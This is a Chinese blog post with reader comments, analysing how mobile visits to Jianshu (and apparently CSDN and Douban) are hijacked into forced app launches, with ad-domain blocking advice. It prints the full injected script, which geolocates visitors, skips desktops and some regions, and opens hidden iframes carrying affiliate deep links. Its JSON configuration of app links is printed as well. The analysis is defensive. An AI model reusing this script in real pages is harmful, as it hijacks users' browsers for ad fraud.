简书移动端Web劫持、跳转app问题

每次手机上搜资料时,只要进入了简书,那么必定会跳转到各种app(淘宝、京东、天猫、京东金融等等),很烦的啊。
2020-02-02 更新:
在csdn、豆瓣上也发现这个问题。
 
我还以为是我本地宽带或者dns劫持,但是我本地dns用的是114和119,很少出现这种问题,而且简书也是https,浏览器也是绿标,
所以就usb chrome 远程调试看了下,不看不知道,居然会唤醒这么多app和跳转网页。

临时解决方案

屏蔽  ad.lflucky.com 这个域名(建议屏蔽这个域名下的所有二级域名),host改也行。
方法一: 手机端使用 火狐浏览器,安装 AdGuard 广告过滤插件,屏蔽 ad.lflucky.com  
方法二、有位读者推荐的软件也很不错,AdGuard Home ,安装在软路由中使用~
2020-03-09:
广告代码改为https://jian.t58b.com/js/jan/jian.js
所以,继续屏蔽 jian.t58b.com
 
最后想了下,既然是cdn劫持,那么我把cdn域名一刀切怎么样,别说,效果还蛮不错的,界面干净了。
屏蔽整个cdn下的js,不过这样带来的后果是文章不能动态加载出来,只适合偶尔使用简书。

cdn2.jianshu.io/*.js

 
 
手机端用yandex浏览器,装广告屏蔽插件,屏蔽  ad.lflucky.com 这个域名(建议屏蔽这个域名下的所有二级域名),我个人装的是广告终结者,本来想装uBlock的,懒得折腾就没装。
或者路由器ad插件屏蔽这个域名。
添加屏蔽域名后完美,终于不再跳转。

分析

因为我的前端是废的,所以也只能进行简单点的分析,大佬们看看就好了。
简单分析了一下跳转js,点击 VM2486:1 进入到js,格式化后的代码如下

(function() {
	function getJson(a, b) {
		var c = new XMLHttpRequest();
		c.open("get", a);
		c.send(null);
		c.onreadystatechange = function() {
			if (c.readyState == 4 && c.status == 200) {
				b && b(eval("(" + c.responseText + ")"))
			}
		}
	}
	function ProductLink(a) {
		this.product = a.productJson;
		this.disabledArea = ["UNITED STATES", "JAPAN", "SINGAPORE", "CANADA", "香港", "北京", "上海"];
		this.avokeTime = a.avokeTime
	}
	ProductLink.prototype.init = function() {
		var b = this;
		if (window.navigator.platform.indexOf("Win") > -1 || window.navigator.platform.indexOf("Mac") > -1) {} else {
			this.isDisabled(function() {
				var a = true;
				try {
					for (var i = 0; i < b.disabledArea.length; i++) {
						if (returnCitySN["cname"].indexOf(b.disabledArea[i]) > -1) {
							a = false;
							break
						}
					}
				} catch(e) {}
				if (!a) {
					return
				}
				b.addElement()
			})
		}
	};
	ProductLink.prototype.isDisabled = function(a) {
		var b = document.createElement("script");
		var c = false;
		document.body.appendChild(b);
		b.src = "https://pv.sohu.com/cityjson";
		b.onload = function() {
			if (!c) {
				c = true;
				a && a()
			}
		};
		setTimeout(function() {
			if (!c) {
				c = true;
				a && a()
			}
		},
		4000)
	};
	ProductLink.prototype.addElement = function() {
		var a = this;
		setTimeout(function() {
			a.showMainProject();
			a.showSecondaryProduct()
		},
		2000)
	};
	ProductLink.prototype.showMainProject = function() {
		this.showAllKind(this.product.mainProduct.appLink, this.product.mainProduct.cancelTime)
	};
	ProductLink.prototype.showSecondaryProduct = function() {
		var b = this;
		var c = this.product.secondaryProduct.concat();
		var d = c.length;
		var e = null;
		e = setInterval(function() {
			if (d <= 0) {
				clearInterval(e);
				return
			}
			var a = Math.floor(Math.random() * d);
			b.showAllKind(c[a].appLink, c[a].cancelTime);
			c.splice(a, 1);
			d--
		},
		b.avokeTime * 1000)
	};
	ProductLink.prototype.showAllKind = function(a, b) {
		var c = a.concat();
		var d = c.length;
		var e = false;
		var f = this.getCurrentDate();
		while (d > 0 && !e) {
			var g = Math.floor(Math.random() * d);
			if (c[g].type == "random") {
				this.newIframe(c[g].link, b);
				e = true
			} else if (c[g].type == "date") {
				if (c[g][f]) {
					this.newIframe(c[g][f], b);
					e = true
				} else {
					c.splice(g, 1);
					d--
				}
			}
		}
	};
	ProductLink.prototype.getCurrentDate = function() {
		var a = new Date(),
		Y = a.getFullYear() + "-",
		M = (a.getMonth() + 1 < 10 ? "0" + (a.getMonth() + 1) : a.getMonth() + 1) + "-",
		D = a.getDate() < 10 ? "0" + a.getDate() : a.getDate();
		return Y + M + D
	};
	ProductLink.prototype.newIframe = function(b, c) {
		var d = document.createElement("iframe");
		d.style.display = "none";
		d.src = b;
		document.body.appendChild(d);
		var e = document.createElement("iframe");
		e.style.display = "none";
		e.src = "./counturl.html?url=" + encodeURIComponent(b);
		document.body.appendChild(e);
		setTimeout((function(m, a) {
			return function() {
				document.body.removeChild(m);
				document.body.removeChild(a)
			}
		})(d, e), c * 1000)
	};
	getJson("./json/product.json",
	function(a) {
		new ProductLink(a).init()
	})
})();

嗯,上面有个getJson方法,搜索了下加载记录发现域名是:

https://ad.lflucky.com/janes/json/product.json(对应ip为:59.110.185.253)

阿里云的机器,很不错,考虑到个各种不同的宽带用户给予最佳的劫持体验
Json内容如下(时间 2019-08-31 15:52 ):

{
    "productJson": {
        "mainProduct": {
            "appName": "tb",
            "appLink": [
                {
                    "type": "random",
                    "link": "tbopen://m.taobao.com/tbopen/index.html?source=auto&action=ali.open.nav&module=h5&bootImage=0&spm=2014.ugdhh.4076930961.10016-1208-32768&bc_fl_src=growth_dhh_4076930961_10016-1208-32768&materialid=10016&h5Url=https://h5.m.taobao.com/bcec/dahanghai-jump.html?spm=2014.ugdhh.4076930961.10016-1208-32768&bc_fl_src=growth_dhh_4076930961_10016-1208-32768"
                }
            ],
            "cancelTime": 5
        },
        "secondaryProduct": [
            {
                "appName": "uc",
                "appLink": [
                    {
                        "type": "date",
                        "2019-08-30": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=17707084109410804287&type=multiple&from=6001",
                        "2019-08-31": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
                        "2019-09-01": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
                        "2019-09-02": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
                        "2019-09-03": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=5414198177651951323&type=multiple&from=6001",
                        "2019-09-04": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=5414198177651951323&type=multiple&from=6001",
                        "2019-09-05": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=1692900910150652661&type=multiple&from=6001",
                        "2019-09-06": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=1692900910150652661&type=multiple&from=6001"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "sjbd",
                "appLink": [
                    {
                        "type": "random",
                        "link": "baiduboxapp://v1/easybrowse/open?url=https://dwz.cn/1VJnrokX?u=68a5251f61c446dd&needlog=1&logargs={"source":"1023217w","from":"openbox","page":"other","type":"","value":"url","channel":""}"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "yk",
                "appLink": [
                    {
                        "type": "random",
                        "link": "youku://weex?source=00002184&url=https://t.youku.com/yep/page/m/sanfang1903_wmdt?wh_weex=true&isNeedBaseImage=1&refer=sanfang1903_operation.qrwang_00002184_000000_2qiMB3_19053000&refer=sanfang1903_operation.qrwang_00002184_000000_2qiMB3_19053000"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "wph",
                "appLink": [
                    {
                        "type": "random",
                        "link": "vipshop://goHome?tra_from=tra:C01V4m1bc22uzug2::mig_code::ac010m4olsydie4ern10dr6k8vkne6bd"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "jdjr",
                "appLink": [
                    {
                        "type": "random",
                        "link": "jdmobile://share?jumpType=8&jumpUrl=https://u.jd.com/Yxw5iX?channellv=hqtf1&channel=default&sourceUrl=1108*gt001"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "pdd",
                "appLink": [
                    {
                        "type": "random",
                        "link": "pinduoduo://com.xunmeng.pinduoduo/duo_coupon_landing.html?goods_id=2338511&pid=8827514_107105089&cpsSign=CC_190820_8827514_107105089_49f497cee8712faf331724b17240bda9&duoduo_type=2"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "zfb",
                "appLink": [
                    {
                        "type": "random",
                        "link": "alipays://platformapi/startapp?appClearTop=false&appId=20000067&startMultApp=YES&url=https://render.alipay.com/p/f/fd-jr8wq5v4/pages/inside/index.html?pid=2088231933430185&partnerid=fl01&__webview_options__=pd%3DNO%26ttb%3Dauto&enableWK=YES"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "jd",
                "appLink": [
                    {
                        "type": "random",
                        "link": "openapp.jdmobile://virtual?params={\"category\":\"jump\",\"sourceType\":\"sourceType_test\",\"des\":\"m\",\"url\":\"https://u.jd.com/dRrNLl\",\"unionSource\":\"Awake\",\"channel\":\"cedad4c0ad02455c9a818f1b3d98da1a\",\"union_open\":\"union_cps\"}"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "jrtt",
                "appLink": [
                    {
                        "type": "date",
                        "2019-08-30": "snssdk143://search?keyword=信息学奥赛取消+有学生集训数月&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-08-31": "snssdk143://search?keyword=在家乡一口气买十套房?柳岩回应&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-01": "snssdk143://search?keyword=国内首例克隆猫主人:花了25万&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-02": "snssdk143://search?keyword=迪士尼不接受调解+坚持翻包检查&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-03": "snssdk143://search?keyword=宠物医疗市场扩张+执业医师稀缺&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-04": "snssdk143://search?keyword=游客坐路中央拍照交警提醒&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-05": "snssdk143://search?keyword=天降垃圾砸车可起诉全楼&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-06": "snssdk143://search?keyword=健身房承诺开泳池未兑现被投诉&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "douyin",
                "appLink": [
                    {
                        "type": "date",
                        "2019-08-30": "snssdk1128://detail?id=6727796549604150532&gd_label=click_schema_lx5",
                        "2019-08-31": "snssdk1128://detail?id=6727793959982157063&gd_label=click_schema_lx5",
                        "2019-09-01": "snssdk1128://detail?id=6728772476395949320&gd_label=click_schema_lx5",
                        "2019-09-02": "snssdk1128://detail?id=6728647813158145291&gd_label=click_schema_lx5",
                        "2019-09-03": "snssdk1128://detail?id=6729018672242871556&gd_label=click_schema_lx5",
                        "2019-09-04": "snssdk1128://detail?id=6729044398245498124&gd_label=click_schema_lx5",
                        "2019-09-05": "snssdk1128://detail?id=6728696625901980931&gd_label=click_schema_lx5"
                    }
                ],
                "cancelTime": 5
            }
        ]
    },
    "avokeTime": 2
}

在 productJson.secondaryProduct 看出,总共会跳转以下几个app

  1. UC
  2. sjbk(不知道是啥)
  3. yk(优酷)
  4. wph(不知道是啥)
  5. jdjr(京东金融)
  6. pdd(拼多多)
  7. zfb(支付宝)
  8. jd(京东)
  9. jrtt(不知道是啥)
  10. douyin(抖音)

可以看出来是真的恶心,最恶心的是跳转到这些页面

https://mip.yemnn.cn/llq_5/p7069z.html
https://m.685862.vip/2019llq_5/p7069z.html?20190901001245&t=1786766884&f=1&i=1

导致不能后退、强制下载app,而且又得看历史记录才能到原来浏览的地方。这个部分没有重现出来,后面补上。



 
然后继续往上走,发现这个域名第一次出现的地方是

https://cdn2.jianshu.io/asimov/2.0a635c573bb72b959d07.js,简书的cdn

同时访问搜狐的接口进行ip地域解析,根据用户所在地区进行不同的广告或者跳转app。
剩下的不用分析也知道了,只有几种可能

  1. 简书 官方自己搞得跳转代码
  2. 简书用的cdn服务商进行的劫持
  3. 运营商结合cdn服务商一起劫持

此时我这里 cdn2.jianshu.io 解析的ip为:163.177.20.232
而在ipip和17ce发现,解析到这个ip的地区是广州联通、加上我的地区,会发生劫持。
 





 
 

Yandex浏览器添加ad插件进行屏蔽


跳转到页面,待复现分析......

更新

由于我开启了ipv6,默认解析dns变成了运营商的ipv6,导致返回的ip和公共dns不一样,运营商+cdn运营商劫持?
openwrt居然不能指定ipv6的dns,dncp给客户端的v6居然是运营商的
而电脑手机会按照v6的dns进行解析,不按照设置的v4 dns解析。


根据ipip显示信息来看,是一家 天际友盟  广告联盟,而我好奇的是,这家公司是怎么拿到简书的ssl证书的?
手机浏览器还显示绿标
 

 

更新

在禁用ipv6后,我本地使用114和119解析还是被劫持的ip


 

评论

  1. looqir
    1年前
    2020-4-28 15:50:29

    请问不让返回的代码是什么呀

  2. AAC
    1年前
    2020-4-02 9:11:15

    sjbd=手机百度

  3. 1年前
    2020-3-11 0:05:50

    我因为这个都不在手机点开简书;1,噗 :mrgreen:

  4. ywq
    1年前
    2020-3-05 15:12:30

    wph=唯品会
    jrtt=今日头条

    • admin 博主
      1年前
      2020-3-05 21:30:22

      make~

  5. xixihaha
    2年前
    2020-2-02 19:53:09

    我也分析出来了 ad.lflucky.com 网址,除了简书 还有 豆瓣 ...都有劫持跳转app要慢慢分析了

    • admin 博主
      2年前
      2020-2-02 20:12:57

      csdn也是,貌似cdn投毒......

      • xixihaha
        1年前
        2020-2-12 14:16:58

        我用AdGuard Home放在路由器上,从此世界清净

        • admin 博主
          1年前
          2020-2-12 15:56:16

          我也试了一下,还是挺不错的~谢谢推荐 😀

    • 黑夜里的黑猫
      1年前
      2020-6-05 21:47:59

      手机知乎也是这样。

  6. jean
    2年前
    2020-1-29 20:16:21

    互联网毒瘤, 下个手机换苹果, 安卓没人权

    • admin 博主
      2年前
      2020-1-29 20:28:37

      这个没办法,国内环境不好,各种卖流量,其实用qq浏览器之类的也可以避免这种情况,但是用了国产浏览器后……你懂的……

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇